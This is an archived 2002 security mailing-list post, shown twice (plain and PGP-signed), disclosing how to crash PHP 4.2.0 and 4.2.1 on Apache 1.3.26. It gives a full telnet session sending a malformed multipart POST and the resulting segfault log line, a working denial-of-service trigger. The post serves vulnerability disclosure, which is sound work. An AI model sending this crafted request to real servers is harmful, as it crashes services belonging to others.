How to reproduce PHP segfault.

From: Joseph S. Testa II (jtestaat_private)
Date: Wed Jul 24 2002 - 06:47:10 PDT

Next message: Andrea Lisci: "Re: Arbitrary Code Execution Vulnerability in VanDyke SecureCRT 3.4 & 4.0 beta"

Previous message: Dr. Peter Bieringer: "[Full-Disclosure] Pyramid BenHur Firewall active FTP portfilter ruleset results in a firewall leak"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Happy Wednesday.

     The following is an example on how to reproduce the segmentation violation
in PHP 4.2.0 & PHP 4.2.1 with Apache 1.3.26 on Linux x86:


[jdog@wonderland logs]$ telnet 192.168.x.x 80
Trying 192.168.x.x...
Connected to 192.168.x.x.
Escape character is '^]'.
POST /chad_owns_me.php HTTP/1.0
Content-type: multipart/form-data; boundary=---------------------------123
Content-length: 129

-----------------------------123
Content-Disposition: filename

http://www.rapid7.com/
-----------------------------123--

Connection closed by foreign host.
[jdog@wonderland logs]$ cat error_log
[Tue Jul 23 11:11:52 2002] [notice] child pid 8948 exit signal Segmentation fault (11)
[jdog@wonderland logs]$


     Note that a path to an existing PHP file must be used, otherwise the PHP
interpreter will not be invoked.


     - Joe


GPG key:  http://www.cs.rit.edu/~jst3290/joetesta_r7.pub
A22B 2683 C40E 5443 AE52  AD6D 65B2 F5DF 4B11 06B4



-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1



Happy Wednesday.

    The following is an example on how to reproduce the segmentation violation
in PHP 4.2.0 & PHP 4.2.1 with Apache 1.3.26 on Linux x86:


[jdog@wonderland logs]$ telnet 192.168.x.x 80
Trying 192.168.x.x...
Connected to 192.168.x.x.
Escape character is '^]'.
POST /chad_owns_me.php HTTP/1.0
Content-type: multipart/form-data; boundary=---------------------------123
Content-length: 129

- -----------------------------123
Content-Disposition: filename

http://www.rapid7.com/
- -----------------------------123--

Connection closed by foreign host.
[jdog@wonderland logs]$ cat error_log 
[Tue Jul 23 11:11:52 2002] [notice] child pid 8948 exit signal Segmentation fault (11)
[jdog@wonderland logs]$ 


    Note that a path to an existing PHP file must be used, otherwise the PHP
interpreter will not be invoked.


    - Joe


GPG key:  http://www.cs.rit.edu/~jst3290/joetesta_r7.pub
A22B 2683 C40E 5443 AE52  AD6D 65B2 F5DF 4B11 06B4

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.7 (GNU/Linux)

iD8DBQE9PptSZbL130sRBrQRAsSAAJ4+FbEbPXqy5VKUcRDzeO1NzcY/1gCdH3MM
oRkBUnspQkZ3JARKDTL5Oe8=
=KzKt
-----END PGP SIGNATURE-----

Next message: Andrea Lisci: "Re: Arbitrary Code Execution Vulnerability in VanDyke SecureCRT 3.4 & 4.0 beta"
Previous message: Dr. Peter Bieringer: "[Full-Disclosure] Pyramid BenHur Firewall active FTP portfilter ruleset results in a firewall leak"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Wed Jul 24 2002 - 07:33:49 PDT